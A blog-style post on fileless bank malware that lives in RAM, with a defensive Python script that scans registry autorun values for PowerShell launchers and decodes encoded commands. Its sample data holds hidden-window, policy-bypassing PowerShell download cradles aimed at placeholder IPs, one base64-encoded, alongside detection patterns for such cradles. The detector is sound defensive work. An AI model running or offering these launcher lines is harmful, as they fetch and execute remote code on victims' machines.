Ars Technica reported today on a new rash of bank-targeting malware infections which, unlike your average malware, store almost nothing on infected users’ disk drives and instead live almost entirely in a computer’s RAM. (What little they do leave on disk amounts to small PowerShell commands stored in the Windows registry; the registry is the only foothold that survives a reboot.) As a result, they are tremendously difficult to detect, and may have been operating undetected for months already.
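As an added example, not code from the Ars Technica report, from Kaspersky, or from the original post, here is a small Python triage script for the one artifact this kind of malware does leave behind: a PowerShell launcher sitting in a registry autorun value. It flags the usual fileless markers (hidden window, profile and execution-policy bypasses, download cradles, in-memory loading) and decodes `-EncodedCommand` arguments, which PowerShell expects as base64 of UTF-16LE text, so the hidden command is inspected rather than just the wrapper. The registry value names, command lines and IP addresses below are constructed for the example, and the indicator list and scoring threshold are assumptions of mine, not anything reported.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Markers of a PowerShell launcher that keeps its payload out of the file system:
# the registry value is the only thing on disk, everything else is fetched or
# decoded straight into memory. Patterns are case-insensitive and accept
# PowerShell's abbreviated switch forms (-w hidden, -nop, -ep, -exec).
# This indicator list is an assumption of the example, not a published signature.
INDICATORS = {
    "powershell-host":   re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden-window":     re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "no-profile":        re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy-bypass":     re.compile(r"-e(?:p|x\w*)\s+bypass\b", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-cradle":   re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "in-memory-load":    re.compile(r"frombase64string|reflection\.assembly|virtualalloc", re.I),
}
# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc), followed by base64.
ENCODED_SWITCH = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\b\s+([A-Za-z0-9+/=]{8,})", re.I)


@dataclass
class Finding:
    name: str
    value: str
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def score(self) -> int:
        return len(self.indicators)


def decode_encoded_command(value: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_SWITCH.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # bad base64 or not UTF-16LE text
        return None


def analyse_entry(name: str, value: str) -> Finding:
    """Score one autorun value; non-PowerShell launchers are out of scope and score 0."""
    finding = Finding(name=name, value=value)
    if not INDICATORS["powershell-host"].search(value):
        return finding
    texts = [value]
    decoded = decode_encoded_command(value)
    if decoded is not None:
        finding.decoded = decoded
        finding.indicators.append("encoded-command")
        texts.append(decoded)   # inspect what the base64 hides, not only the wrapper
    for label, pattern in INDICATORS.items():
        if label != "powershell-host" and any(pattern.search(t) for t in texts):
            finding.indicators.append(label)
    return finding


def scan_autoruns(entries: List[Tuple[str, str]], threshold: int = 2) -> List[Finding]:
    """Return findings at or above the (assumed) threshold, highest score first."""
    findings = [analyse_entry(n, v) for n, v in entries]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample of HKCU\...\Run values (not data from the report). The third
# entry is built with the same UTF-16LE/base64 encoding -EncodedCommand expects,
# so the decoder is exercised on realistic input. IPs are documentation ranges.
HIDDEN_PAYLOAD = 'Invoke-Expression (New-Object Net.WebClient).DownloadString("http://203.0.113.9/s")'
ENCODED_PAYLOAD = base64.b64encode(HIDDEN_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater", "powershell.exe -NoP -W Hidden -Exec Bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""),
    ("svc", f"powershell -enc {ENCODED_PAYLOAD}"),
]

if __name__ == "__main__":
    for f in scan_autoruns(SAMPLE_RUN_VALUES):
        print(f"{f.name}: score={f.score} indicators={f.indicators}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

In practice the entries would come from an Autoruns export or from reading the Run, RunOnce and Winlogon keys on each host; the point of the decoder is that a value reading only `powershell -enc ...` tells a grep-based check nothing, while the decoded text carries the same download cradle as the plain-text variant. Scores are a triage aid, not a verdict: a single hidden-window switch is common in legitimate scheduled maintenance scripts, which is why the threshold defaults to two indicators.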
In total, “140 unnamed organizations” in 40 countries have known infections, with organizations in “the US, France, Ecuador, Kenya, and the UK” being most frequently targeted.
Notably, the first time this technique was seen was two years ago, in malware connected with the state-sponsored Stuxnet that was used against Iran’s uranium-enrichment program. In the current campaign, the in-memory component is Meterpreter, with Mimikatz following up to harvest whatever credentials are cached in the computer’s memory. The same toolkit also appears to have been used to steal money from the banks’ ATMs, though the mechanics of that are as yet unrevealed, as is how the malware spreads from computer to computer. Indeed, given how hard this malware is to detect, there are likely many more infected computers than we know about.